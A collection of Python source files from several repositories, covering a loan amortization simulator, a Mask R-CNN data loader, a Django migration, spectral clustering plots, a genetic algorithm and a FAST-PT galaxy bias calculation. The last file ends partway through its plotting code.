c6774283e7dc5b2af73cfe173f9f654e0741ff3f | a5a6fb8850c75a49a78cf7d0601a4423e6c251df | /dev/src/pyscripts/loan_model.py | 30224132555fe1f4a33e402b34cb9a6a8761cf7c | [] | no_license | 4theKnowledge/retirement_simulation | b9d4b2371cb4f879d4fddee23181f98e732c8a87 | 104d3fbc3eac458cc7661eba8e9a2ed3befa4e7a | refs/heads/master | 2023-04-15T01:07:17.206956 | 2021-04-18T00:55:19 | 2021-04-18T00:55:19 | 222,358,880 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,334 | py | """
"""
import pandas as pd
from datetime import date
import numpy as np
from collections import OrderedDict
from dateutil.relativedelta import *
from datetime import datetime, timedelta
import matplotlib.pyplot as plt
from absl import flags
from absl import app
FLAGS = flags.FLAGS
flags.DEFINE_float('loan_amt', 500000, 'Loan amount (principal)')
flags.DEFINE_float('loan_ir', 0.04, 'Interest rate for mortgage amortization')
flags.DEFINE_integer('loan_length_yrs', 30, 'Mortgage length')
flags.DEFINE_boolean('var_ir', False, 'Interest rate type - fixed (False) or variable (True)')
flags.DEFINE_string('var_ir_fluct', 'conservative', 'Interest rate fluctuation / behaviour setting')
flags.DEFINE_float('add_payment', 0, 'Additional principal payment above minimum repayment')
flags.DEFINE_integer('pa_payments', 12, 'Number of payments (and compounding events) per annum')
flags.DEFINE_string('loan_start_dt', '01-01-2020', 'Start date of loan')
def amortize(argv, lump_sum=0, lump_sum_dt=None):
init_addl_principal = FLAGS.add_payment
pmt = -round(np.pmt(FLAGS.loan_ir/FLAGS.pa_payments, FLAGS.loan_length_yrs*FLAGS.pa_payments, FLAGS.loan_amt), 2)
# initialize the variables to keep track of the periods and running balances
p = 1
# Init temporary variables with default flag values; this is because we do not want to override the flag values
beg_balance = FLAGS.loan_amt
end_balance = FLAGS.loan_amt
start_date = datetime.strptime(FLAGS.loan_start_dt, "%d-%m-%Y")
if lump_sum_dt:
lump_sum_dt = datetime.strptime(lump_sum_dt, "%d-%m-%Y")
var_ir = FLAGS.var_ir
loan_ir = FLAGS.loan_ir
add_payment = FLAGS.add_payment
loan_amt = FLAGS.loan_amt
while end_balance > 0:
# Fluctuate variable interest...
if var_ir and start_date.month == 6 and loan_ir < 0.06:
# print('Modifying interest rate...')
# Assumes that interest rate changes occur mid-year
if FLAGS.var_ir_fluct == 'chaotic':
loan_ir = loan_ir * np.random.uniform(0.5, 1.5)
if FLAGS.var_ir_fluct == 'aggressive':
loan_ir = loan_ir * np.random.uniform(0.8,1.2)
if FLAGS.var_ir_fluct == 'moderate':
                loan_ir = loan_ir * np.random.uniform(0.875,1.125)
if FLAGS.var_ir_fluct == 'conservative':
loan_ir = loan_ir * np.random.uniform(0.95,1.05)
# print(loan_ir)
# Recalculate the interest based on the current balance
interest = round(((loan_ir/FLAGS.pa_payments) * beg_balance), 2)
# Determine payment based on whether or not this period will pay off the loan
pmt = min(pmt, beg_balance + interest)
loan_amt = pmt - interest
# Ensure additional payment gets adjusted if the loan is being paid off.
# If the difference between the beginning balance and principal is < additional payment, reduce additional
# payment to match remaining balance.
# Add lump-sum event (Assumes that payment occurs at month begin)
if start_date == lump_sum_dt:
adhoc_paymnt = min((add_payment + lump_sum), beg_balance - loan_amt)
# print(f'Adhoc - Lump sum payment: ${adhoc_paymnt:0.0f}')
end_balance = beg_balance - (loan_amt + adhoc_paymnt)
else:
            add_payment = min(add_payment, beg_balance - loan_amt)
end_balance = beg_balance - (loan_amt + add_payment)
adhoc_paymnt = 0
yield OrderedDict([('Month', start_date),
('Period', p),
('Begin Balance', beg_balance),
('Payment', pmt),
                           ('Principal', loan_amt),
('Interest', interest),
('Interest_Rate', loan_ir),
('Additional_Payment', add_payment),
('Adhoc Payment', adhoc_paymnt),
('End Balance', end_balance)])
if add_payment > (beg_balance - loan_amt):
add_payment = init_addl_principal
# Increment the counter, balance and date
p += 1
start_date += relativedelta(months=1)
beg_balance = end_balance
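# Editor's note (addition): np.pmt above is the standard annuity payment
# formula pmt = P*i / (1 - (1 + i)**-n), with i the per-period rate and n the
# total number of periods; each generator step then splits that payment into
# its interest and principal portions.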
def amortize_format(df):
"""
Format amortize generator.
"""
df.set_index('Month', inplace=True)
df.index = pd.to_datetime(df.index)
return df
def loan_comparison(argv, df_ls, df_nls):
"""
"""
# Loan payoff time
time_ls = df_ls['Month'].iloc[-1]
time_nls = df_nls['Month'].iloc[-1]
print(f'Time saved on loan: {time_nls.year - time_ls.year} years (Make this more accurate later on...)')
# Interest saved
total_interest_ls = df_ls['Interest'].sum()
total_interest_nls = df_nls['Interest'].sum()
print(f'Interest Saved: ${(total_interest_nls - total_interest_ls):0.0f}')
total_cost_ls = total_interest_ls + FLAGS.loan_amt
total_cost_nls = total_interest_nls + FLAGS.loan_amt
print(f'Total Loan Cost: NLS ${total_cost_nls:0.0f} LS ${total_cost_ls:0.0f}')
def loan_plot(df_ls, df_nls):
"""
"""
fig, axs = plt.subplots(2, 1)
axs[0].scatter(x=df_ls['Month'], y=df_ls['Interest'], color='g')
axs[0].scatter(x=df_nls['Month'], y=df_nls['Interest'], color='r')
axs[0].legend(['Lump Sum', 'No Lump Sum'])
axs[0].set_ylabel('Interest ($)')
axs[0].set_xlabel('Time (Months)')
axs[1].scatter(x=df_ls['Month'], y=df_ls['Interest_Rate'] * 100, color='g')
axs[1].scatter(x=df_nls['Month'], y=df_nls['Interest_Rate'] * 100, color='r')
axs[1].legend(['Lump Sum', 'No Lump Sum'])
axs[1].set_ylim([-10,10])
axs[1].set_ylabel('Interest Rate (%)')
axs[1].set_xlabel('Time (Months)')
fig.tight_layout()
plt.show()
def main(argv):
# Lump Sum (ls)
    loan_ls = pd.DataFrame(amortize(argv, lump_sum = 200000, lump_sum_dt = '01-06-2022'))
# print(loan_ls.head(25))
# No Lump Sum (nls)
    loan_nls = pd.DataFrame(amortize(argv))
print(loan_nls.head(25))
loan_comparison(argv, loan_ls, loan_nls)
loan_plot(loan_ls, loan_nls)
if __name__ == '__main__':
    app.run(main)
| [
"[email protected]"
] | |
d3865afb9c7300e8cc858ad93c1718ce8a5add80 | 2bbc523c1d75d0fca4956030d95402b78f41413e | /maskrcnn_test/maskrcnn_benchmark/data/build.py | ab04e590bf319467a99c17ac561e5758dbcecdc2 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | ivalab/grasp_primitiveShape | 30d66ac05db07d0b840012154b1653e4f0b00131 | 1d5ce48084e431944fed1239622f3cba97a9edf9 | refs/heads/master | 2022-01-18T21:46:24.276050 | 2021-10-27T22:17:07 | 2021-10-27T22:17:07 | 232,348,859 | 14 | 4 | null | null | null | null | UTF-8 | Python | false | false | 6,781 | py | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
import bisect
import copy
import logging
import torch.utils.data
from maskrcnn_benchmark.utils.comm import get_world_size
from maskrcnn_benchmark.utils.imports import import_file
from . import datasets as D
from . import samplers
from .collate_batch import BatchCollator
from .transforms import build_transforms
def build_dataset(dataset_list, transforms, dataset_catalog, is_train=True):
"""
Arguments:
dataset_list (list[str]): Contains the names of the datasets, i.e.,
coco_2014_trian, coco_2014_val, etc
transforms (callable): transforms to apply to each (image, target) sample
dataset_catalog (DatasetCatalog): contains the information on how to
construct a dataset.
is_train (bool): whether to setup the dataset for training or testing
"""
if not isinstance(dataset_list, (list, tuple)):
raise RuntimeError(
"dataset_list should be a list of strings, got {}".format(dataset_list)
)
datasets = []
for dataset_name in dataset_list:
data = dataset_catalog.get(dataset_name)
factory = getattr(D, data["factory"])
args = data["args"]
# for COCODataset, we want to remove images without annotations
# during training
if data["factory"] == "COCODataset":
args["remove_images_without_annotations"] = is_train
if data["factory"] == "PascalVOCDataset":
args["use_difficult"] = not is_train
args["transforms"] = transforms
# make dataset from factory
dataset = factory(**args)
datasets.append(dataset)
# for testing, return a list of datasets
if not is_train:
return datasets
# for training, concatenate all datasets into a single one
# TODO(Clark): Not sure if it is good to change here to enlarge the dataset size
# dataset = datasets[0]
datasets.append(datasets[0])
if len(datasets) > 1:
dataset = D.ConcatDataset(datasets)
return [dataset]
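# Editor's note (addition): datasets.append(datasets[0]) above intentionally
# doubles the first dataset (see the TODO comment), so the training-time
# ConcatDataset is larger than the raw dataset list.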
def make_data_sampler(dataset, shuffle, distributed):
if distributed:
return samplers.DistributedSampler(dataset, shuffle=shuffle)
if shuffle:
sampler = torch.utils.data.sampler.RandomSampler(dataset)
else:
sampler = torch.utils.data.sampler.SequentialSampler(dataset)
return sampler
def _quantize(x, bins):
bins = copy.copy(bins)
bins = sorted(bins)
quantized = list(map(lambda y: bisect.bisect_right(bins, y), x))
return quantized
def _compute_aspect_ratios(dataset):
aspect_ratios = []
for i in range(len(dataset)):
img_info = dataset.get_img_info(i)
aspect_ratio = float(img_info["height"]) / float(img_info["width"])
aspect_ratios.append(aspect_ratio)
return aspect_ratios
def make_batch_data_sampler(
dataset, sampler, aspect_grouping, images_per_batch, num_iters=None, start_iter=0
):
if aspect_grouping:
if not isinstance(aspect_grouping, (list, tuple)):
aspect_grouping = [aspect_grouping]
aspect_ratios = _compute_aspect_ratios(dataset)
group_ids = _quantize(aspect_ratios, aspect_grouping)
batch_sampler = samplers.GroupedBatchSampler(
sampler, group_ids, images_per_batch, drop_uneven=False
)
else:
batch_sampler = torch.utils.data.sampler.BatchSampler(
sampler, images_per_batch, drop_last=False
)
if num_iters is not None:
batch_sampler = samplers.IterationBasedBatchSampler(
batch_sampler, num_iters, start_iter
)
return batch_sampler
def make_data_loader(cfg, is_train=True, is_distributed=False, start_iter=0):
num_gpus = get_world_size()
if is_train:
images_per_batch = cfg.SOLVER.IMS_PER_BATCH
        assert (
            images_per_batch % num_gpus == 0
        ), "SOLVER.IMS_PER_BATCH ({}) must be divisible by the number of GPUs ({}) used.".format(
            images_per_batch, num_gpus
        )
images_per_gpu = images_per_batch // num_gpus
shuffle = True
num_iters = cfg.SOLVER.MAX_ITER
else:
images_per_batch = cfg.TEST.IMS_PER_BATCH
        assert (
            images_per_batch % num_gpus == 0
        ), "TEST.IMS_PER_BATCH ({}) must be divisible by the number of GPUs ({}) used.".format(
            images_per_batch, num_gpus
        )
images_per_gpu = images_per_batch // num_gpus
shuffle = False if not is_distributed else True
num_iters = None
start_iter = 0
if images_per_gpu > 1:
logger = logging.getLogger(__name__)
logger.warning(
"When using more than one image per GPU you may encounter "
"an out-of-memory (OOM) error if your GPU does not have "
"sufficient memory. If this happens, you can reduce "
"SOLVER.IMS_PER_BATCH (for training) or "
"TEST.IMS_PER_BATCH (for inference). For training, you must "
"also adjust the learning rate and schedule length according "
"to the linear scaling rule. See for example: "
"https://github.com/facebookresearch/Detectron/blob/master/configs/getting_started/tutorial_1gpu_e2e_faster_rcnn_R-50-FPN.yaml#L14"
)
# group images which have similar aspect ratio. In this case, we only
# group in two cases: those with width / height > 1, and the other way around,
# but the code supports more general grouping strategy
aspect_grouping = [1] if cfg.DATALOADER.ASPECT_RATIO_GROUPING else []
paths_catalog = import_file(
"maskrcnn_benchmark.config.paths_catalog", cfg.PATHS_CATALOG, True
)
DatasetCatalog = paths_catalog.DatasetCatalog
dataset_list = cfg.DATASETS.TRAIN if is_train else cfg.DATASETS.TEST
transforms = build_transforms(cfg, is_train)
datasets = build_dataset(dataset_list, transforms, DatasetCatalog, is_train)
data_loaders = []
for dataset in datasets:
sampler = make_data_sampler(dataset, shuffle, is_distributed)
batch_sampler = make_batch_data_sampler(
dataset, sampler, aspect_grouping, images_per_gpu, num_iters, start_iter
)
collator = BatchCollator(cfg.DATALOADER.SIZE_DIVISIBILITY)
num_workers = cfg.DATALOADER.NUM_WORKERS
data_loader = torch.utils.data.DataLoader(
dataset,
num_workers=num_workers,
batch_sampler=batch_sampler,
collate_fn=collator,
)
data_loaders.append(data_loader)
if is_train:
# during training, a single (possibly concatenated) data_loader is returned
assert len(data_loaders) == 1
return data_loaders[0]
return data_loaders
| [
"[email protected]"
] | |
0485cdb57fedae3455ec6f17d4568e7e9d1c1f45 | 8908e53525bec8f9a0c9c627be81fa1790c161b2 | /post/migrations/0005_auto_20201031_1114.py | 6776158e7f138adf6b0540695b603daf391bd2fe | [] | no_license | rajni04/farmery | e4033d0f4abc6b4ab086c261ca7d6898d9b5b63d | 3a4a30dab3d614cd4a25b1e5de3e0f5d35bf80b1 | refs/heads/master | 2023-01-08T00:15:20.467363 | 2020-11-01T14:36:45 | 2020-11-01T14:36:45 | 290,197,615 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 751 | py | # Generated by Django 3.1 on 2020-10-31 05:44
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('post', '0004_post_content'),
]
operations = [
migrations.AddField(
model_name='post',
name='next_post',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='next', to='post.post'),
),
migrations.AddField(
model_name='post',
name='previous_post',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='previous', to='post.post'),
),
]
| [
"[email protected]"
] | |
27ee3f82f144919b6a6735616610891dbef90858 | 6046c74ff04da073523cb3b843977fd48acbdc0c | /htsint/stats/SpectralClusterResults.py | cbc8a7cb32bccbfdbfaf26c8c31d50c83e69a707 | [
"BSD-3-Clause",
"LicenseRef-scancode-public-domain",
"MIT"
] | permissive | apex-omontgomery/htsint | 24d1c346fd345e2bb56f53e07624615fc36e01a2 | 5f4408c5427db176dc131a1fdab05ba3405aa904 | refs/heads/master | 2022-12-24T08:30:41.108365 | 2016-05-23T04:11:32 | 2016-05-23T04:11:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,361 | py | #!/usr/bin/env python
"""
Load and plot spectral clustering results: silhouette values and cluster sizes over a (k, sigma) parameter scan.
"""
import os,csv
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
__author__ = "Adam Richards"
class SpectralClusterResults(object):
"""
A class to handle spectral clustering results
"""
def __init__(self,silvalsFile,clustersFile):
"""
Constructor
"""
## error checking
for filePath in[silvalsFile,clustersFile]:
if not os.path.exists(filePath):
raise Exception("could not find file: %s"%filePath)
self.clusters = self.load_clusters_file(clustersFile)
self.kRange,self.sigRange,self.silvals = self.load_silvals_file(silvalsFile)
def load_clusters_file(self,clusterFile):
"""
load the clusters file
k,sigma,clustid1,clustid2,....clustid_max
"""
fid = open(clusterFile,'r')
reader = csv.reader(fid)
header = reader.next()
clusterIds = np.array(header[2:])
results = {}
for linja in reader:
k = str(int(linja[0]))
sigma = str(round(float(linja[1]),4))
if not results.has_key(k):
results[k] = {}
results[k][sigma] = np.array([float(i) for i in linja[2:]])
fid.close()
return results
def load_silvals_file(self,silvalsFile):
"""
load the clusters file
k,sigma,clustid1,clustid2,....clustid_max
"""
fid = open(silvalsFile,'r')
reader = csv.reader(fid)
header = reader.next()
kRange = set([])
sigRange = set([])
for linja in reader:
k = int(linja[0])
sigma = round(float(linja[1]),4)
kRange.update([k])
sigRange.update([sigma])
fid.close()
kRange = np.sort(np.array(list(kRange)))
sigRange = np.sort(np.array(list(sigRange)))
## create matrix with k as rows and sigma as columns
resultsMat = np.zeros((kRange.size,sigRange.size),)
fid = open(silvalsFile,'r')
reader = csv.reader(fid)
header = reader.next()
for linja in reader:
k = int(linja[0])
sigma = round(float(linja[1]),4)
kInd = np.where(kRange==k)[0]
sInd = np.where(sigRange==sigma)[0]
resultsMat[kInd,sInd] = float(linja[2])
fid.close()
return kRange,sigRange,resultsMat
def plot(self,threshMax=100,threshMin=5,fontSize=10,fontName='sans-serif',cmap=plt.cm.PuOr,figName='param-scan.png'):
"""
create a heatmap plot
top panel are the sil values
bottom panel denotes cluster sizes with respect to a specified range
"""
clustersMat = np.zeros((self.kRange.size,self.sigRange.size),)
for k in self.kRange:
for sigma in self.sigRange:
clusters = self.clusters[str(k)][str(sigma)]
tooSmall = np.where(clusters < threshMin)[0]
tooLarge = np.where(clusters > threshMax)[0]
tooSmallGenes = np.array([clusters[ts] for ts in tooSmall]).sum()
tooLargeGenes = np.array([clusters[tl] for tl in tooLarge]).sum()
percentAccepted = ((clusters.sum() - tooSmallGenes - tooLargeGenes) / clusters.sum())
kInd = np.where(self.kRange==k)[0]
sInd = np.where(self.sigRange==sigma)[0]
clustersMat[kInd,sInd] = percentAccepted
## get best
combined = clustersMat + self.silvals
cols = np.argsort(combined.max(axis=0))[::-1][:3]
rows = np.argsort(combined.max(axis=1))[::-1][:3]
print("The maximimum values are:")
print("best k: %s"%self.kRange[rows[0]])
print("best sigma: %s"%self.sigRange[cols[0]])
## create the figure
fig = plt.figure(figsize=(7,6))
ax1 = plt.subplot2grid((2, 5), (0, 0),colspan=4)
ax2 = plt.subplot2grid((2, 5), (1, 0),colspan=4)
ax4 = plt.subplot2grid((2, 5), (0, 4),rowspan=2)
## sil value panel
ax1.plot(cols,rows,color='k',marker='x',markersize=5,markeredgewidth=4,linestyle='None')
p1 = ax1.imshow(self.silvals, interpolation='nearest',vmin=-1.0,vmax=1.0, origin='lower',aspect='auto',cmap=cmap)
ax1.set_xticks(range(self.sigRange.shape[0]))
ax1.set_yticks(range(self.kRange.shape[0]))
ax1.set_xticklabels([round(i,2) for i in self.sigRange],rotation=45,fontsize=fontSize,fontname=fontName)
ax1.set_yticklabels([int(round(i)) for i in self.kRange],fontsize=fontSize,fontname=fontName)
ax1.set_title("Silhouette values",fontsize=fontSize+2,fontname=fontName)
ax1.set_ylabel(r"$k$",fontsize=fontSize+1,fontname=fontName)
ax1.set_xlabel(r"$\sigma$",fontsize=fontSize+1,fontname=fontName)
#ax1.yaxis.set_major_locator(MaxNLocator(5))
## cluster size panel
ax2.plot(cols,rows,color='k',marker='x',markersize=5,markeredgewidth=4,linestyle='None')
p2 = ax2.imshow(clustersMat, interpolation='nearest',vmin=-1.0,vmax=1.0, origin='lower',aspect='auto',cmap=cmap)
ax2.set_xticks(range(self.sigRange.shape[0]))
ax2.set_yticks(range(self.kRange.shape[0]))
ax2.set_xticklabels([round(i,2) for i in self.sigRange],rotation=45,fontsize=fontSize,fontname=fontName)
ax2.set_yticklabels([int(round(i)) for i in self.kRange],fontsize=fontSize,fontname=fontName)
ax2.set_title(r"Cluster size $\geq " + str(threshMin) + "$ and $\leq " + str(threshMax) + "$ (%)",fontsize=fontSize+2,fontname=fontName)
ax2.set_ylabel(r"$k$",fontsize=fontSize+1,fontname=fontName)
ax2.set_xlabel(r"$\sigma$",fontsize=fontSize+1,fontname=fontName)
#ax2.yaxis.set_major_locator(MaxNLocator(5))
## add text
plt.figtext(0.07,0.92,"A",weight='bold')
plt.figtext(0.07,0.42,"B",weight='bold')
## colorbar
norm = mpl.colors.Normalize(vmin=-1.0, vmax=1.0)
cb1 = mpl.colorbar.ColorbarBase(ax4,cmap=cmap,norm=norm,orientation='vertical')
fig.subplots_adjust(wspace=0.45,hspace=0.5)
plt.savefig(figName,dpi=400)
if __name__ == "__main__":
print "Running..."
| [
"[email protected]"
] | |
41ae2604c48a9730f3d33ab619376565bf36e041 | a0410af9159861d466a055d8f66cc06fc151f0fd | /GenAlgorithm.py | c4b1f774eda891d506a59482d8d8565d70bf33f8 | [] | no_license | ArgaMelvern/GeneticAlgorithm | f8580cdfa085cfb14b897e84439b7c2adaf7b605 | e36989b0625578b86d0909fa53a82d61a8f8b7ef | refs/heads/main | 2023-04-04T22:09:25.226797 | 2021-04-21T11:23:10 | 2021-04-21T11:23:10 | 360,138,908 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,365 | py | # -*- coding: utf-8 -*-
"""GA Kel 8.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1vMvWFQ0GWGaW3TqwS53j5FeWpNFy9Fbv
h(x,y) = (x^2 * sin y^2) + (x + y)
-1 โค x โค 2 dan -1 โค y โค 1
"""
import random
import math
import pandas as pd
"""# Fungsi Bantuan"""
# Membuat Kromosom Populasi
def generatePopulation(sum_pop, bitnum) :
pops = []
for i in range (sum_pop) :
chromosomes = []
for i in range (bitnum) :
chromosomes.append(random.choice([0,1]))
pops.append(chromosomes)
return pops
# Convert X and Y from binary to float
def convert(bin_x, bitnum, ra, rb) :
ret = []
a = ra - rb
b = 0
for i in range (1, bitnum+1) :
b += 2 ** (i*-1)
c = 0
for i in range (len(bin_x)) :
temp = 0
c = 0
for j in range (bitnum) :
temp = (j+1)*-1
c += bin_x[i][j] * (2**temp)
sum = rb + ((a / b) * c)
ret.append(sum)
return ret
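# Editor's note (addition): the decoding above maps a bit string g to the real
# interval [rb, ra] as x = rb + (ra - rb) * (sum_j g_j * 2**-(j+1)) / (sum_j 2**-(j+1)),
# the usual binary-chromosome decoding for GA function optimization.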
# Combine the X and Y chromosomes
def combineChrom(bin_x,bin_y) :
new_population = []
for i in range(len(bin_x)):
new_population.append(bin_x[i] + bin_y[i])
return new_population
# Compute the fitness value from X and Y
def computeFitness(dec_x, dec_y) :
ret = []
for i in range(len(dec_x)) :
x = dec_x[i]
y = dec_y[i]
sum = (x**2 * math.sin(y**2)) + (x+y)
ret.append(sum)
return ret
"""# Seleksi Orang tua dan Crossover"""
# seleksi orangtua
def ParentSelRoulette(new_population,arr_fit,sum_pop):
sumFit = 0
getChance = []
sumChance = []
#Total Fitness
for i in range(sum_pop):
sumFit += arr_fit[i]
    #Normalize fitness / percentage
for i in range(sum_pop):
getChance.append(arr_fit[i] / sumFit)
    #Cumulative normalized fitness
sumFit = 0
for i in range(sum_pop):
sumFit += getChance[i]
sumChance.append(sumFit)
Parent = []
for i in range(2):
rand = random.uniform(0,sumFit)
        for j in range(sum_pop):
            if sumChance[j] > rand :
                Parent.append(new_population[j])
                break
    return Parent[0],Parent[1]
#crossover
def crossOver(Parent1,Parent2):
child1,child2 = [],[]
prob = random.random()
if prob < 0.9 :
Halfing = random.randint(0,len(Parent1)-1)
child1[:Halfing],child1[Halfing:] = Parent1[:Halfing],Parent2[Halfing:]
child2[:Halfing],child2[Halfing:] = Parent2[:Halfing],Parent1[Halfing:]
return child1,child2
else :
return Parent1,Parent2
# Find the maximum fitness value
def findMaxFitness(fit_xy) :
max = fit_xy[0]
    for i in range(1, len(fit_xy)) :
if fit_xy[i] > max :
max = fit_xy[i]
return max
# Find the indices of the two highest fitness values
def find2IdxMaxFitness(fit_xy) :
max1 = 0
max2 = -1
max = fit_xy[0]
    for i in range(1, len(fit_xy)) :
if fit_xy[i] > fit_xy[max1] :
max1 = i
if max1 == 0 :
max2 = 1
else :
max2 = 0
    for i in range(1, len(fit_xy)) :
if fit_xy[i] > fit_xy[max2] and i != max1 :
max2 = i
return max1,max2
# Mutation step (bit flip with probability 1/10)
def mutation (chromosome) :
newChromosome = chromosome
rand = random.randint(1,10)
if rand == 1 :
rand2 = random.randint(0, len(chromosome) - 1)
if newChromosome[rand2] == 0 :
newChromosome[rand2] = 1
else :
newChromosome[rand2] = 0
return newChromosome
# Build a new generation
def regeneration(xy, fit_xy, sum_pop) :
newGen = []
max1, max2 = find2IdxMaxFitness(fit_xy)
newGen.append(xy[max1])
newGen.append(xy[max2])
for i in range ((sum_pop//2)-1) :
parents1,parents2 = ParentSelRoulette(xy,fit_xy,sum_pop)
childs1,childs2 = crossOver(parents1,parents2)
childs1 = mutation(childs1)
childs2 = mutation(childs2)
newGen.append(childs1)
newGen.append(childs2)
return newGen
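# Editor's note (addition): regeneration() is elitist -- the two fittest
# chromosomes are carried over unchanged, then roulette selection, one-point
# crossover (probability 0.9) and single-bit mutation (probability 0.1) fill
# out the rest of the population.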
def split(chrom,check=False):
split = len(chrom) // 2
if check == True :
return chrom[:split]
return chrom[split:]
"""# Fungsi Main"""
# Parameter umum
sum_pop = 20
bitnum = 3
raX = 2
raY = 1
rbXY = -1
# Key variables
bin_x = generatePopulation(sum_pop, bitnum)
bin_y = generatePopulation(sum_pop, bitnum)
dec_x = convert(bin_x, bitnum, raX, rbXY)
dec_y = convert(bin_y, bitnum, raY, rbXY)
fit_xy = computeFitness(dec_x, dec_y)
# Process
xy = combineChrom(bin_x, bin_y)
best_fit = []
best_chrome = []
best_fit.append(findMaxFitness(fit_xy))
for i in range (50) :
next_xy = regeneration(xy,fit_xy, sum_pop)
fit_xy = []
next_x = []
next_y = []
for j in range (sum_pop) :
next_x.append(split((next_xy[j]),check=True))
next_y.append(split((next_xy[j])))
next_dec_x = convert(next_x, bitnum, raX, rbXY)
next_dec_y = convert(next_y, bitnum, raY, rbXY)
fit_xy = computeFitness(next_dec_x, next_dec_y)
xy = next_xy
a, b = find2IdxMaxFitness(fit_xy)
best_chrome.append(a)
best_fit.append(findMaxFitness(fit_xy))
best_xy, temp = find2IdxMaxFitness(fit_xy)
# Output the best solution
print("best solution : ", findMaxFitness(fit_xy))
print("chromosome : ", xy[best_xy])
print("x = ", next_dec_x[best_xy])
print("y = ", next_dec_y[best_xy])
| [
"[email protected]"
] | |
86e26bb2ee53eacf2538f4609492b9edef7c6ffc | 6a69c5c22877c5eefd64302e17bef821ad384100 | /compute_galaxy_bias_perturbative.py | 5213c09c982799cbed8d4bbf6c339b6c9221171f | [] | no_license | BenWibking/FAST-PT | bf37e78b31714a8bae7d77424d3413cb93cef164 | 945827ae747e03c6a7041faf3a684b5c4859d28d | refs/heads/master | 2021-04-25T06:59:35.130595 | 2018-02-20T18:51:01 | 2018-02-20T18:51:01 | 122,223,749 | 0 | 0 | null | 2018-02-20T16:26:19 | 2018-02-20T16:26:19 | null | UTF-8 | Python | false | false | 6,212 | py | '''
Compute perturbative galaxy bias model.
Based on 'fastpt_example_plot.py' included in FAST-PT (commit 19472bf)
Ben Wibking, Feb. 2018
'''
import numpy as np
import scipy.integrate as integrate
from scipy.interpolate import interp1d
import FASTPT
import HT
def j0(x):
return ( np.sin(x) / x )
def j1(x):
return ( (np.sin(x)/x**2) - (np.cos(x)/x) )
def bin_avg_spherical_j0(k,rminus,rplus):
"""compute the bin-averaged spherical Bessel function j0."""
integral = lambda r: r**2 * j1(k*r) / k
return (3.0 / (rplus**3 - rminus**3)) * (integral(rplus) - integral(rminus))
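# Editor's note (addition): the closed form above uses the identity
# d/dr [ r**2 * j1(k*r) / k ] = r**2 * j0(k*r), so the volume average of j0
# over the shell [rminus, rplus] is 3 * [r**2 * j1(k*r) / k] evaluated between
# the bin edges, divided by (rplus**3 - rminus**3).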
def xi_fftlog(k,pk):
alpha_k=1.5
beta_r=-1.5
mu=.5
pf=(2*np.pi)**(-1.5)
r, this_xi = HT.k_to_r(k, pk, alpha_k, beta_r, mu, pf)
return r, this_xi
def xi_simple_binaverage(k_in,pk_in,rmin=0.1,rmax=130.0,nbins=200):
"""compute the integral of bessel function
over the galaxy power spectrum to obtain the 3d real-space correlation function."""
bins = np.logspace(np.log10(rmin),np.log10(rmax),nbins+1)
binmin = bins[:-1]
binmax = bins[1:]
bins = zip(binmin, binmax)
r = 0.5*(binmin+binmax)
xi = np.empty(binmin.shape[0])
pk_interp = interp1d(k_in,pk_in)
super_fac = 16
k = np.logspace(np.log10(k_in[0]),np.log10(k_in[-1]),k_in.shape[0]*super_fac)
pk = pk_interp(k)
for i, (rminus, rplus) in enumerate(bins):
# compute signal in bin i on the interval [rminus, rplus)
y = k**2 / (2.0*np.pi**2) * bin_avg_spherical_j0(k,rminus,rplus) * pk
result = integrate.simps(y*k, x=np.log(k)) # do integral in d(ln k)
xi[i] = result
return r,xi
# load the input power spectrum data
# (TODO: call pycamb directly)
d=np.loadtxt('Pk_test.dat')
kin=d[:,0]
Pin=d[:,1]
#k = kin
#P = Pin
#from P_extend import k_extend
#extrap = k_extend(kin, high=2.0) # log10
#k = extrap.extrap_k()
#P = extrap.extrap_P_high(Pin)
npoints = 6000
power=interp1d(kin,Pin)
k=np.logspace(np.log10(kin[0]),np.log10(kin[-1]),npoints)
P=power(k)
print('k-points: {}'.format(k.shape[0]))
print('kmin = {}; kmax = {}'.format(np.min(k),np.max(k)))
print('dk/k = {}'.format(np.max(np.diff(k)/k[:-1])))
P_window=np.array([.2,.2])
C_window=.65
nu=-2; n_pad=1000
# initialize the FASTPT class
log_kmin = -5.0
log_kmax = 3.0 # extrapolating too far increases noise in P_{1loop}, thus in P_gg
fastpt=FASTPT.FASTPT(k,nu,low_extrap=log_kmin,high_extrap=log_kmax,n_pad=n_pad,verbose=True)
P_lin, Pd1d2, Pd2d2, Pd1s2, Pd2s2, Ps2s2, sig4 = fastpt.P_bias(P,C_window=C_window)
# **DO NOT** subtract asymptotic terms according to the user manual
#Pd2d2 -= 2.0*sig4
#Pd2s2 -= (4./3.)*sig4
#Ps2s2 -= (8./9.)*sig4
# now add P_spt to P_lin *after* computing bias terms
P_spt=fastpt.one_loop(P,C_window=C_window)
def galaxy_power(b1,b2,bs):
# P+P_spt below should be the full nonlinear power spectrum, in principle
# (might want to replace it with HALOFIT power spectrum?)
P_g = (b1**2)*(P+P_spt) + (b1*b2)*Pd1d2 + (1./4.)*(b2**2)*Pd2d2 + (b1*bs)*Pd1s2 + (1./2.)*(b2*bs)*Pd2s2 + (1./4.)*(bs**2)*Ps2s2
return P_g
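# Editor's note (addition): this is the standard quadratic (b1, b2, bs) galaxy
# bias expansion,
#   P_gg = b1^2 P_mm + b1*b2 P_d1d2 + (1/4) b2^2 P_d2d2
#          + b1*bs P_d1s2 + (1/2) b2*bs P_d2s2 + (1/4) bs^2 P_s2s2,
# with the P_xy terms taken from FAST-PT's P_bias output above.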
import matplotlib.pyplot as plt
from matplotlib.ticker import FormatStrFormatter
fig=plt.figure()
x1=10**(-2.5)
x2=1e2
ax1=fig.add_subplot(111)
ax1.set_ylim(1e-2,1e5)
ax1.set_xlim(x1,x2)
ax1.set_xscale('log')
ax1.set_yscale('log')
